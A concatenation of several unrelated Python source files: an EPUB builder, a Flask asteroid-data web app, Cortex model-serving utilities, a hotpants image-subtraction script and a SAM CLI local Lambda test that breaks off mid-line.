import codecs import html import os import queue import re import shutil import threading import uuid import zipfile from subprocess import call from sys import platform, exit import requests from bs4 import BeautifulSoup _download_queue = queue.Queue() _PROGRESS_LOCK = threading.Lock() _HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'} _error_counter = {} class Epub: """ deal with epub Attributes: volume_name: A string represent the volume name volume_number: A string represent the volume number volume_author: A string represent the author volume_illustrator: A string represent the illustrator volume_introduction: A string represent the introduction volume_cover_url: A string represent the cover_url output_dir: A string represent the epub save path cover_path: A string represent the cover path out_format: A string represent the output format (epub by default) (For other format Mac OS X only) book_name: A string represent the book name uuid: A string represent the book uuid chapter: A list represent the chapter base_path: A string represent the epub temp path date: A string represent the date the book last updated (As specified in ISO 8601) generated_file: A string represent the generated filename """ def __init__(self, output_dir=None, cover_path=None, single_thread=False, out_format='epub', **kwargs): self.output_dir = output_dir self.cover_path = cover_path self.single_thread = single_thread self.out_format = out_format self.uuid = str(uuid.uuid1()) self.__dict__.update(kwargs) self.base_path = '' self.pictures = [] self.generated_file = '' self.finished_picture_number = 0 def create_folders(self): if not os.path.exists(self.base_path): os.mkdir(self.base_path) if not os.path.exists(os.path.join(self.base_path, 'Text')): os.mkdir(os.path.join(os.path.join(self.base_path, 'Text'))) if not os.path.exists(os.path.join(self.base_path, 'Styles')): os.mkdir(os.path.join(os.path.join(self.base_path, 'Styles'))) if not os.path.exists(os.path.join(self.base_path, 'Images')): os.mkdir(os.path.join(os.path.join(self.base_path, 'Images'))) shutil.copy2('./templates/style.css', os.path.join(os.path.join(self.base_path, 'Styles'))) def move_or_download_cover(self): if not self.cover_path: self.pictures.append(self.cover_url) else: temp_cover_path = os.path.join(os.path.join(self.base_path, 'Images'), self.cover_path.split('/')[-1]) shutil.copyfile(self.cover_path, temp_cover_path) @staticmethod def print_info(info): try: print(info) except UnicodeDecodeError as e: print('Ignored:', e) except UnicodeEncodeError as e: print('Ignored:', e) def download_progress(self): with _PROGRESS_LOCK: self.finished_picture_number += 1 sharp_number = round(self.finished_picture_number / len(self.pictures) * 60) space_number = 60 - sharp_number print( '\r' + str(self.finished_picture_number) + '/' + str( len(self.pictures)) + '[' + '#' * sharp_number + ' ' * space_number + ']', end='') def download_picture(self): """ download pictures from _download_queue change headers if timeout """ while not _download_queue.empty(): url = _download_queue.get() try: path = os.path.join(os.path.join(self.base_path, 'Images'), url.split('/')[-1]) if not os.path.exists(path): r = requests.get(url, headers=_HEADERS, stream=True, timeout=10) if r.status_code == requests.codes.ok: temp_chunk = r.content with open(path, 'wb') as f: f.write(temp_chunk) else: print('Error {} when trying to get {}'.format(r.status_code, url)) self.download_progress() except Exception as e: print(e) error_count = _error_counter.get(url, 0) if error_count < 5: _error_counter[url] = error_count + 1 _download_queue.put(url) else: print('Too many error, cancel.') self.download_progress() finally: _download_queue.task_done() @staticmethod def extract_number(filename): m = re.search(r'\d+', filename) return int(m.group(0)) if m else -1 @staticmethod def file_to_string(file_path): """ read the file as a string Args: file_path: A string represent the file path to read Return: A string """ with codecs.open(file_path, 'r', 'utf-8') as f: return ''.join(f.readlines()) def create_cover_html(self): cover_name = self.cover_url.split('/')[-1] cover_html = self.file_to_string('./templates/Cover.html') final_cover_html = cover_html.format(cover_name=cover_name, introduction=self.introduction) return final_cover_html @staticmethod def write_html(html, file_path): with codecs.open(file_path, 'w', 'utf-8') as f: f.write(BeautifulSoup(html, 'lxml').prettify()) @staticmethod def write_xml(xml, file_path): with codecs.open(file_path, 'w', 'utf-8') as f: f.write(xml) def create_chapter_html(self): chapter_html = self.file_to_string('./templates/Chapter.html') final_chapter_htmls = [] for chapter in sorted(self.chapters, key=lambda x: x[0]): content = [] chapter_name = chapter[1] for line in chapter[2]: if line.startswith('[img]'): image_url = re.search(r'\](.*)\[', line).group(1) self.pictures.append(image_url) image = '<div class="illust"><img alt="" src="../Images/' + image_url.split('/')[ -1] + '" /></div>\n<br/>' content.append(image) elif line == '<br>': content.append('<br/>') else: content.append('<p>' + html.escape(line) + '</p>') one_chapter_html = chapter_html.format(chapter_name=html.escape(chapter_name), content='\n'.join(content)) final_chapter_htmls.append(one_chapter_html) return final_chapter_htmls def create_title_html(self): title_html = self.file_to_string('./templates/Title.html') author = '<p class="titlep">作者:' + self.author + '</p>' illustrator = '' if not self.illustrator else '<p class="titlep">插画:' + self.illustrator + '</p>' final_title_html = title_html.format(book_name=self.book_name, volume_name=self.volume_name, volume_number=self.volume_number, author=author, illustrator=illustrator) return final_title_html def create_contents_html(self): contents_html = self.file_to_string('./templates/Contents.html') contents = [] for i in sorted(self.chapters, key=lambda chapter: chapter[0]): contents.append('<li class="c-rules"><a href="../Text/chapter' + str(i[0]) + '.html">' + i[1] + '</a></li>') final_contetns_html = contents_html.format(contents='\n'.join(contents)) return final_contetns_html def download_all_pictures(self): for picture in self.pictures: _download_queue.put(picture) th = [] self.print_info('Start downloading pictures, total number:' + str(len(self.pictures))) for i in range(5): t = threading.Thread(target=self.download_picture) t.daemon = True t.start() th.append(t) for t in th: t.join() print() def create_content_opf_xml(self): content_opf_xml = self.file_to_string('./templates/content.opf') cover_name = self.cover_url.split('/')[-1] file_paths = [] for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Text')): for file in sorted(filenames, key=self.extract_number): if file != 'toc.ncx': file_paths.append( '<item href="Text/' + file + '" id="' + file + '" media-type="application/xhtml+xml" />') break file_paths.append('<item href="Styles/style.css" id="style.css" media-type="text/css" />') for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Images')): for file in filenames: postfix = file.split('.')[-1] postfix = 'jpeg' if postfix == 'jpg' else postfix file_paths.append( '<item href="Images/' + file + '" id="img' + file + '" media-type="image/' + postfix + '" />') break chapter_orders = [] for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Text')): for file in sorted(filenames, key=self.extract_number): if file not in ('Cover.html', 'Title.html', 'Contents.html'): chapter_orders.append('<itemref idref="' + file + '" />') final_content_opf_xml = content_opf_xml.format(book_name=html.escape(self.book_name), volume_number=self.volume_number, uuid=self.uuid, cover_name='img' + cover_name, source=self.source, date=self.date, introduction=html.escape(self.introduction), author=self.author, file_paths='\n'.join(file_paths), chapter_orders='\n'.join(chapter_orders)) return final_content_opf_xml def create_toc_xml(self): toc_xml = self.file_to_string('./templates/toc.ncx') nav = [] playorder = 4 for i in sorted(self.chapters, key=lambda chapter: chapter[0]): nav.append( '<navPoint id="chapter' + str(i[0]) + '" playOrder="' + str(playorder) + '">\n<navLabel>\n<text>' + i[1] + '</text>\n</navLabel>\n<content src="Text/chapter' + str(i[0]) + '.html"/>\n</navPoint>') playorder += 1 final_toc_xml = toc_xml.format(uuid=self.uuid, book_name=html.escape(self.book_name), author=self.author, nav='\n'.join(nav)) return final_toc_xml def create_html(self): """create the html file for epub""" html_path = os.path.join(self.base_path, 'Text') cover_html = self.create_cover_html() self.write_html(cover_html, os.path.join(html_path, 'Cover.html')) chapter_htmls = self.create_chapter_html() for i, chapter_html in enumerate(chapter_htmls): self.write_html(chapter_html, os.path.join(html_path, 'chapter' + str(i) + '.html')) title_html = self.create_title_html() self.write_html(title_html, os.path.join(html_path, 'Title.html')) contents_html = self.create_contents_html() self.write_html(contents_html, os.path.join(html_path, 'Contents.html')) self.download_all_pictures() content_opf_xml = self.create_content_opf_xml() self.write_xml(content_opf_xml, os.path.join(self.base_path, 'content.opf')) toc_xml = self.create_toc_xml() self.write_xml(toc_xml, os.path.join(self.base_path, 'toc.ncx')) def zip_files(self): folder_name = os.path.basename(self.base_path) with zipfile.ZipFile(folder_name + '.epub', 'w', zipfile.ZIP_DEFLATED) as z: z.write('./files/mimetype', 'mimetype', compress_type=zipfile.ZIP_STORED) for dir_path, dir_names, filenames in os.walk(self.base_path): for file in filenames: f = os.path.join(dir_path, file) z.write(f, 'OEBPS//' + f[len(self.base_path) + 1:]) z.write('./files/container.xml', 'META-INF//container.xml') def convert(self): """convert epub file to out_format by using calibre app""" file_in = self.generated_file file_out = self.generated_file.replace('.epub', '.' + self.out_format) if platform == "linux" or platform == "linux2": # linux command = ['/usr/bin/ebook-convert', file_in, file_out] call(command) elif platform == "darwin": # OS X command = ['/Applications/calibre.app/Contents/MacOS/ebook-convert', file_in, file_out] call(command) elif platform == "win32": # Windows... print('Format conversion is not supported on Windows (yet).') exit() os.remove(file_in) self.generated_file = file_out def move_file(self): if not os.path.exists(self.output_dir): print('Output dir not exist!') elif os.path.exists(os.path.join(self.output_dir, self.generated_file)): print('{} already exist in the output folder'.format(self.generated_file)) else: shutil.move(self.generated_file, self.output_dir) print('{} has been generated successfully'.format(self.generated_file)) def generate_file(self): """generate file""" self.print_info('Generating {}'.format(self.filename)) folder_name = re.sub(r'[<>:"/\\|\?\*]', '_', self.filename) self.base_path = os.path.abspath(folder_name) self.create_folders() self.move_or_download_cover() self.create_html() self.zip_files() self.generated_file = folder_name + '.epub' if self.out_format != 'epub': self.convert() self.print_info('\n已生成:{}.{}\n'.format(self.filename, self.out_format)) # delete temp file shutil.rmtree(self.base_path) # move file if self.output_dir: self.move_file()
app.py
#!/usr/bin/env python from flask import Flask, request, redirect, session, url_for, render_template, Response, jsonify, make_response, send_from_directory from flask.ext.assets import Environment, Bundle from flask.ext.mail import Mail import urllib import urlparse import json import random import base64 import re import filters import threading import api from stackblink import stackblink from skymorph import skymorph def import_sdss(): from sdss import sdss pass t1 = threading.Thread(target=import_sdss) t1.start() app = Flask(__name__) mail = Mail(app) filters.register_filters(app) app.secret_key = 'not a secret key' try: import local_config app.config['ASSETS_DEBUG'] = local_config.DEBUG except ImportError: pass app.config['ASSETS_DEBUG'] = True # bundling assets = Environment(app) # This filter can be helping for debugging javascript. def noop_filter(_in, out, **kw): out.write(_in.read()) # static files @app.route('/sitemap.xml') @app.route('/robots.txt') def static_from_route(): return send_from_directory(app.static_folder, request.path[1:]) # main routes @app.route('/') def index(): return render_template('index.html') @app.route('/upcoming') def upcoming(): return render_template('upcoming.html') @app.route('/3d/') def view_3d_slash(): return render_template('full3d.html', noop=noop_filter) @app.route('/offline_3d') def view_3d_offline(): pt_vars = {}; pt_vars['offline_mode'] = True pt_vars['score_rankings'] = json.dumps(api.rankings('score', 4000, True), allow_nan=False) pt_vars['value_rankings'] = json.dumps(api.rankings('value', 4000, True), allow_nan=False) pt_vars['accessibility_rankings'] = json.dumps(api.rankings('accessibility', 4000, True), allow_nan=False) pt_vars['smallest_rankings'] = json.dumps(api.rankings('smallest', 4000, True), allow_nan=False) return render_template('full3d.html', noop=noop_filter, passthrough_vars=pt_vars, \ offline_mode=True) @app.route('/3d/notsupported.html') def notsupported_3d(): return render_template('notsupported.html') @app.route('/asteroid-<asteroid_slug>') def asteroid_details(asteroid_slug=None): # slug is a slug of asteroid prov des if not asteroid_slug: return 'Sorry, could not find this asteroid in our database.', 404 unslug = asteroid_slug.replace('-', ' ') # Need to get top 10, otherwise sometimes the best match is not returned by mongo. candidates = api.autocomplete(unslug, 10) # TODO better way? if len(candidates) < 1: return 'Sorry, could not find this asteroid in our database.', 404 asteroid = candidates[0] jpl_result = api.jpl_lookup(asteroid['prov_des']) if 'spec' in asteroid: composition_result = api.compositions()[asteroid['spec']] else: composition_result = [] return render_template('asteroid.html', asteroid=asteroid, jpl=jpl_result, composition=composition_result) # General api routes @app.route('/api/mpc') def api_mpc(): try: query = json.loads(request.args.get('query') or '{}') limit = min(5000, int(request.args.get('limit') or 1000)) json_resp = json.dumps(api.mpc(query, limit)) return Response(json_resp, mimetype='application/json') except Exception, e: print str(e) resp = jsonify({'error': 'bad request'}) resp.status_code = 500 return resp @app.route('/api/kepler') def api_kepler(): try: query = json.loads(request.args.get('query')) limit = min(1000, int(request.args.get('limit'))) json_resp = json.dumps(api.kepler(query, limit)) return Response(json_resp, mimetype='application/json') except Exception, e: print str(e) resp = jsonify({'error': 'bad request'}) resp.status_code = 500 return resp @app.route('/api/exoplanets') def api_exoplanets(): try: query = json.loads(request.args.get('query')) limit = min(1000, int(request.args.get('limit'))) json_resp = json.dumps(api.exoplanets(query, limit)) return Response(json_resp, mimetype='application/json') except ValueError: resp = jsonify({'error': 'bad request'}) resp.status_code = 500 return resp @app.route('/api/asterank') def api_asterank(): try: query = json.loads(request.args.get('query')) limit = min(1000, int(request.args.get('limit'))) json_resp = json.dumps(api.asterank(query, limit)) return Response(json_resp, mimetype='application/json') except Exception, e: print str(e) resp = jsonify({'error': 'bad request'}) resp.status_code = 500 return resp @app.route('/api/rankings') def rankings(): try: limit = int(request.args.get('limit')) or 10 orbital_info_only = request.args.get('orbits_only') results = api.rankings(request.args.get('sort_by'), limit, orbits_only=orbital_info_only) json_resp = json.dumps(results) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'max-age=432000', # 5 days }) except Exception, e: resp = jsonify({'error': 'bad request', 'details': str(e)}) resp.status_code = 500 return resp @app.route('/api/autocomplete') def autocomplete(): results = api.autocomplete(request.args.get('query'), 10) json_resp = json.dumps(results) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'max-age=432000', # 5 days }) @app.route('/api/compositions') def compositions(): json_resp = json.dumps(api.compositions()) return Response(json_resp, mimetype='application/json') @app.route('/jpl/lookup') def horizons(): query = request.args.get('query') result = api.jpl_lookup(query) if result: json_resp = json.dumps(result) return Response(json_resp, mimetype='application/json') else: return Response('{}', mimetype='application/json') # Skymorph routes @app.route('/api/skymorph/search') def skymorph_search_target(): return jsonify({'results': skymorph.search_target(request.args.get('target'))}) @app.route('/api/skymorph/images_for') def skymorph_images_for(): return jsonify({'images': skymorph.images_for(request.args.get('target'))}) @app.route('/api/skymorph/search_orbit') def skymorph_search_orbit(): search_results = skymorph.search_ephem( \ request.args.get('epoch'), request.args.get('ecc'), request.args.get('per'), request.args.get('per_date'), request.args.get('om'), request.args.get('w'), request.args.get('i'), request.args.get('H'), ) ret = {'results': search_results} return jsonify(ret) @app.route('/api/skymorph/search_position') def skymorph_search_time(): search_results = skymorph.search_position( \ request.args.get('ra'), request.args.get('dec'), request.args.get('time'), ) ret = {'results': search_results} return jsonify(ret) @app.route('/api/skymorph/image') def skymorph_image(): ret = skymorph.get_image(request.args.get('key')) if type(ret) == dict: return jsonify(ret) else: response = make_response(ret) response.headers['Content-type'] = 'image/gif' return response @app.route('/api/skymorph/fast_image') def skymorph_fast_image(): ret = skymorph.get_fast_image(request.args.get('key')) if type(ret) == dict: return jsonify(ret) else: response = make_response(ret) response.headers['Content-type'] = 'image/png' return response # SDSS routes @app.route('/api/sdss/get_unknown_group') def sdss_unknown_group(): from sdss import sdss json_resp = json.dumps(sdss.get_unknown_group()) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'no-cache', }) @app.route('/api/sdss/image') def sdss_image(): from sdss import sdss ret = sdss.image_from_key(request.args.get('key')) response = make_response(ret) response.headers['Content-type'] = 'image/png' return response # Stack/blink Discover routes @app.route('/discover') def discover(): first_time = session.get('discover_first_time', True) session['discover_first_time'] = False return render_template('discover.html', first_time=first_time, image_count=stackblink.get_image_count(), interesting_count=stackblink.get_interesting_count(), user_count=stackblink.get_user_count(), ) @app.route('/api/stackblink/get_neat_control_group') def get_neat_control_group(): json_resp = json.dumps(stackblink.get_control_groups()) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'no-cache', }) @app.route('/api/stackblink/get_sdss_unknown_group') def get_sdss_unknown_group(): from sdss import sdss json_resp = json.dumps(sdss.get_unknown_group()) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'no-cache', }) @app.route('/api/stackblink/record', methods=['GET', 'POST']) def stackblink_record(): postdata = json.loads(request.data) json_resp = json.dumps(stackblink.record( \ postdata.get('email', None), \ postdata.get('keys', None), \ postdata.get('interesting', None), \ postdata.get('poor_quality', None))) return Response(json_resp, mimetype='application/json', headers={ \ 'Cache-Control': 'no-cache', }) # Kepler @app.route('/exoplanets') @app.route('/kepler3d') def kepler3d(): return render_template('kepler3d.html') # User custom objects @app.route('/api/user_objects', methods=['GET', 'POST']) def user_objects(): if request.method == 'GET': return jsonify({'results': api.retrieve_user_objects(300)}) # limit set to 300 objects for now postdata = json.loads(request.data) if 'object' not in postdata: return jsonify({}) obj = postdata['object'] image_keys = postdata.get('keys', None) return jsonify(api.insert_user_object(obj, image_keys)) # Other Pages @app.route('/about', methods=['GET', 'POST']) def about(): if request.method == 'GET': return render_template('about.html') else: email = request.form.get('email', None) feedback = request.form.get('feedback', None) if not feedback or feedback.find('a href') > -1: return 'Form rejected because you look like a spambot. Please email me directly.' from flask.ext.mail import Message msg = Message('Asterank Feedback', sender='feedback@asterank.com', recipients=['typppo@gmail.com'], body='%s:\r\n%s' % (email, feedback)) mail.send(msg) return render_template('about.html') @app.route('/feedback') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/mpc') def mpc(): return render_template('mpc.html') @app.route('/kepler') def kepler(): return render_template('kepler.html') @app.route('/exoplanets') def exoplanets(): return render_template('exoplanets.html') @app.route('/neat') def neat_docs(): return redirect('/skymorph') @app.route('/skymorph') def skymorph_docs(): return render_template('skymorph.html') @app.route('/api') def api_route(): return render_template('api.html') if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', use_reloader=True, threaded=True)
utils.py
# Copyright 2022 Cortex Labs, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import glob import itertools import json import os import shutil import threading as td import time import traceback from collections import defaultdict from http import HTTPStatus from typing import Any, Callable, Dict, List, Optional from starlette.responses import Response from cortex_internal.lib import util from cortex_internal.lib.exceptions import CortexException, UserRuntimeException from cortex_internal.lib.log import configure_logger from cortex_internal.lib.model import validate_model_paths from cortex_internal.lib.storage import S3 from cortex_internal.lib.type import HandlerType logger = configure_logger("cortex", os.environ["CORTEX_LOG_CONFIG_FILE"]) def model_downloader( handler_type: HandlerType, bucket_name: str, model_name: str, model_version: str, model_path: str, temp_dir: str, model_dir: str, ) -> Optional[datetime.datetime]: """ Downloads model to disk. Validates the s3 model path and the downloaded model. Args: handler_type: The handler type as implemented by the API. bucket_name: Name of the bucket where the model is stored. model_name: Name of the model. Is part of the model's local path. model_version: Version of the model. Is part of the model's local path. model_path: Model prefix of the versioned model. temp_dir: Where to temporarily store the model for validation. model_dir: The top directory of where all models are stored locally. Returns: The model's timestamp. None if the model didn't pass the validation, if it doesn't exist or if there are not enough permissions. """ logger.info( f"downloading from bucket {bucket_name}/{model_path}, model {model_name} of version {model_version}, temporarily to {temp_dir} and then finally to {model_dir}" ) client = S3(bucket_name) # validate upstream S3 model sub_paths, ts = client.search(model_path) try: validate_model_paths(sub_paths, handler_type, model_path) except CortexException: logger.info(f"failed validating model {model_name} of version {model_version}") return None # download model to temp dir temp_dest = os.path.join(temp_dir, model_name, model_version) try: client.download_dir_contents(model_path, temp_dest) except CortexException: logger.info( f"failed downloading model {model_name} of version {model_version} to temp dir {temp_dest}" ) shutil.rmtree(temp_dest) return None # validate model model_contents = glob.glob(os.path.join(temp_dest, "**"), recursive=True) model_contents = util.remove_non_empty_directory_paths(model_contents) try: validate_model_paths(model_contents, handler_type, temp_dest) except CortexException: logger.info( f"failed validating model {model_name} of version {model_version} from temp dir" ) shutil.rmtree(temp_dest) return None # move model to dest dir model_top_dir = os.path.join(model_dir, model_name) ondisk_model_version = os.path.join(model_top_dir, model_version) logger.info( f"moving model {model_name} of version {model_version} to final dir {ondisk_model_version}" ) if os.path.isdir(ondisk_model_version): shutil.rmtree(ondisk_model_version) shutil.move(temp_dest, ondisk_model_version) return max(ts) class DynamicBatcher: def __init__( self, handler_impl: Callable, method_name: str, max_batch_size: int, batch_interval_seconds: int, test_mode: bool = False, ): self.method_name = method_name self.handler_impl = handler_impl self.batch_max_size = max_batch_size self.batch_interval_seconds = batch_interval_seconds # measured in seconds self.test_mode = test_mode # only for unit testing self._test_batch_lengths = [] # only when unit testing self.barrier = td.Barrier(self.batch_max_size + 1) self.samples = {} self.results = {} td.Thread(target=self._batch_engine, daemon=True).start() self.sample_id_generator = itertools.count() def _batch_engine(self): while True: if len(self.results) > 0: time.sleep(0.001) continue try: self.barrier.wait(self.batch_interval_seconds) except td.BrokenBarrierError: pass self.results = {} sample_ids = self._get_sample_ids(self.batch_max_size) try: if self.samples: batch = self._make_batch(sample_ids) results = getattr(self.handler_impl, self.method_name)(**batch) if not isinstance(results, list): raise UserRuntimeException( f"please return a list when using server side batching, got {type(results)}" ) if self.test_mode: self._test_batch_lengths.append(len(results)) self.results = dict(zip(sample_ids, results)) except Exception as e: self.results = {sample_id: e for sample_id in sample_ids} logger.error(traceback.format_exc()) finally: for sample_id in sample_ids: del self.samples[sample_id] self.barrier.reset() def _get_sample_ids(self, max_number: int) -> List[int]: if len(self.samples) <= max_number: return list(self.samples.keys()) return sorted(self.samples)[:max_number] def _make_batch(self, sample_ids: List[int]) -> Dict[str, List[Any]]: batched_samples = defaultdict(list) for sample_id in sample_ids: for key, sample in self.samples[sample_id].items(): batched_samples[key].append(sample) return dict(batched_samples) def _enqueue_request(self, sample_id: int, **kwargs): """ Enqueue sample for batch processing. This is a blocking method. """ self.samples[sample_id] = kwargs try: self.barrier.wait() except td.BrokenBarrierError: pass def process(self, **kwargs): """ Queues a request to be batched with other incoming request, waits for the response and returns the processed result. This is a blocking method. """ sample_id = next(self.sample_id_generator) self._enqueue_request(sample_id, **kwargs) result = self._get_result(sample_id) return result def _get_result(self, sample_id: int) -> Any: """ Return the processed result. This is a blocking method. """ while sample_id not in self.results: time.sleep(0.001) result = self.results[sample_id] del self.results[sample_id] if isinstance(result, Exception): return Response( content=str(result), status_code=HTTPStatus.INTERNAL_SERVER_ERROR, media_type="text/plain", ) return result
align+subt_ref2sci.py
#============================================================ # PYTHON SCRIPT FOR SUBTRACTION USING HOTPANTS # Usage : # OR JUST RUN AND WRITE INPUT & REF IMAGE # 2019.07.05 GREGORY S.H. PAEK #============================================================ import numpy as np import os, sys, glob from astropy.io import fits import astropy.coordinates as coord import astropy.units as u from multiprocessing import Process, Pool import multiprocessing as mp import time import alipy #============================================================ def hotpants(imlist, refim, ngmode=False, insig=0, refsig=0): if type(imlist) != list: imlist = [imlist] starttime = time.time() for inim in imlist: outfile = os.path.dirname(inim)+'/hd'+os.path.basename(inim) convfile= os.path.dirname(inim)+'/hc'+os.path.basename(inim) if ngmode == False: com = 'hotpants -c t -n i -iu 60000 -tu 60000 -tl -10000 -v 0 -inim '+inim+' -tmplim '+refim+' -outim '+outfile+' -oci '+convfile elif ngmode == True: sigmatch = np.sqrt(insig**2-refsig**2) com = 'hotpants -c t -n i -iu 60000 -tu 60000 -tl -10000 -v 0 -inim {0} -tmplim {1} -outim {2} -oci {3} -ng 3 6 {4} 4 {5} 2 {6}'.format(inim, refim, outfile, convfile, 0.5*sigmatch, sigmatch, 2.0*sigmatch) os.system(com) deltime = time.time() - starttime print('All PROCESS IS DONE.\t('+str(round(deltime, 1))+' sec)') #------------------------------------------------------------- def gregistering(images_to_align, ref_image): starttime = time.time() if type(images_to_align) != list: images_to_align = [images_to_align] if ref_image == '': ref_image = images_to_align[0] identifications = alipy.ident.run(ref_image, images_to_align, visu=False) for id in identifications: # list of the same length as images_to_align. if id.ok == True: # i.e., if it worked print "%20s : %20s, flux ratio %.2f" % (id.ukn.name, id.trans, id.medfluxratio) else: print "%20s : no transformation found !" % (id.ukn.name) outputshape = alipy.align.shape(ref_image) for id in identifications: if id.ok == True: params_align = dict( filepath = id.ukn.filepath, uknstarlist = id.uknmatchstars, refstarlist = id.refmatchstars, shape = alipy.align.shape(ref_image), outdir = './', makepng = False) alipy.align.irafalign(**params_align) deltime = time.time() - starttime print('All PROCESS IS DONE.\t('+str(round(deltime, 1))+' sec)') #------------------------------------------------------------- def subt_routine(inim, refim, ngmode=False, insig=0, refsig=0): #time.sleep(5) grefim = inim[:-5]+'_ref2sci.fits' gregistering(refim, inim) os.system('mv {0} {1}'.format(refim[:-5]+'_gregister.fits', grefim)) hotpants(inim, grefim, ngmode, insig, refsig) #============================================================ path_base = '.' refim = path_base+'/ref.fits' imlist = glob.glob(path_base+'/Calib-*0.fits') ;imlist.sort() #------------------------------------------------------------ for inim in imlist: insig = fits.getheader(inim)['seeing']/2.355 refsig = fits.getheader(refim)['seeing']/2.355 subt_routine(inim, refim, ngmode=False, insig=insig, refsig=refsig) #------------------------------------------------------------ # MULTI PROCESSING #------------------------------------------------------------ ''' for inim in imlist: if __name__ == '__main__': jobs = [] p = mp.Process(target=subt_routine, args=(inim, refim)) jobs.append(p) p.start() p.join() if __name__ == '__main__': procs = [] for inim in imlist: proc = mp.Process(target=subt_routine, args=(inim, refim, )) procs.append(proc) proc.start() for proc in procs: proc.join() '''
test_local_lambda_invoke.py
import threading import shutil import random from mock import Mock import time from unittest import TestCase import os import requests from samcli.local.lambda_service.local_lambda_invoke_service import LocalLambdaInvokeService from tests.functional.function_code import nodejs_lambda, HELLO_FROM_LAMBDA, ECHO_CODE, THROW_ERROR_LAMBDA from samcli.commands.local.lib import provider from samcli.local.lambdafn.runtime import LambdaRuntime from samcli.commands.local.lib.local_lambda import LocalLambdaRunner from samcli.local.docker.manager import ContainerManager from samcli.local.lambdafn.exceptions import FunctionNotFound from samcli.local.layers.layer_downloader import LayerDownloader from samcli.local.docker.lambda_image import LambdaImage class TestLocalLambdaService(TestCase): @classmethod def mocked_function_provider(cls, function_name): if function_name == "HelloWorld": return cls.hello_world_function if function_name == "ThrowError": return cls.throw_error_function else: raise FunctionNotFound("Could not find Function") @classmethod def setUpClass(cls): cls.code_abs_path_for_throw_error = nodejs_lambda(THROW_ERROR_LAMBDA) # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder cls.cwd_for_throw_error = os.path.dirname(cls.code_abs_path_for_throw_error) cls.code_uri_for_throw_error = os.path.relpath(cls.code_abs_path_for_throw_error, cls.cwd_for_throw_error) # Get relative path with respect to CWD cls.code_abs_path = nodejs_lambda(HELLO_FROM_LAMBDA) # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder cls.cwd = os.path.dirname(cls.code_abs_path) cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd) # Get relative path with respect to CWD cls.hello_world_function_name = "HelloWorld" cls.hello_world_function = provider.Function(name=cls.hello_world_function_name, runtime="nodejs4.3", memory=256, timeout=5, handler="index.handler", codeuri=cls.code_uri, environment=None, rolearn=None, layers=[]) cls.throw_error_function_name = "ThrowError" cls.throw_error_function = provider.Function(name=cls.throw_error_function_name, runtime="nodejs4.3", memory=256, timeout=5, handler="index.handler", codeuri=cls.code_uri_for_throw_error, environment=None, rolearn=None, layers=[]) cls.mock_function_provider = Mock() cls.mock_function_provider.get.side_effect = cls.mocked_function_provider cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd) cls.service.create() t = threading.Thread(name='thread', target=cls.service.run, args=()) t.setDaemon(True) t.start() time.sleep(1) @classmethod def tearDownClass(cls): shutil.rmtree(cls.code_abs_path) shutil.rmtree(cls.code_abs_path_for_throw_error) def setUp(self): # Print full diff when comparing large dictionaries self.maxDiff = None def test_lambda_str_response_is_returned(self): expected = 'Hello from Lambda' response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations') actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 200) def test_request_with_non_existing_function(self): expected_data = {"Message": "Function not found: arn:aws:lambda:us-west-2:012345678901:function:{}".format('IDoNotExist'), "Type": "User"} response = requests.post(self.url + '/2015-03-31/functions/IDoNotExist/invocations') actual_data = response.json() acutal_error_type_header = response.headers.get('x-amzn-errortype') self.assertEquals(actual_data, expected_data) self.assertEquals(acutal_error_type_header, 'ResourceNotFound') self.assertEquals(response.status_code, 404) def test_request_a_function_that_throws_an_error(self): expected_data = {'errorMessage': 'something is wrong', 'errorType': 'Error','stackTrace': ['exports.handler (/var/task/index.js:3:17)']} response = requests.post(self.url + '/2015-03-31/functions/ThrowError/invocations') actual_data = response.json() acutal_error_type_header = response.headers.get('x-amz-function-error') self.assertEquals(actual_data, expected_data) self.assertEquals(acutal_error_type_header, 'Unhandled') self.assertEquals(response.status_code, 200) class TestLocalEchoLambdaService(TestCase): @classmethod def setUpClass(cls): cls.code_abs_path = nodejs_lambda(ECHO_CODE) # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder cls.cwd = os.path.dirname(cls.code_abs_path) cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd) # Get relative path with respect to CWD cls.function_name = "HelloWorld" cls.function = provider.Function(name=cls.function_name, runtime="nodejs4.3", memory=256, timeout=5, handler="index.handler", codeuri=cls.code_uri, environment=None, rolearn=None, layers=[]) cls.mock_function_provider = Mock() cls.mock_function_provider.get.return_value = cls.function cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd) cls.service.create() t = threading.Thread(name='thread', target=cls.service.run, args=()) t.setDaemon(True) t.start() time.sleep(1) @classmethod def tearDownClass(cls): shutil.rmtree(cls.code_abs_path) def setUp(self): # Print full diff when comparing large dictionaries self.maxDiff = None def test_mock_response_is_returned(self): expected = {"key1": "value1"} response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"}) actual = response.json() self.assertEquals(actual, expected) self.assertEquals(response.status_code, 200) def test_binary_octet_stream_format(self): expected = {"key1": "value1"} response = 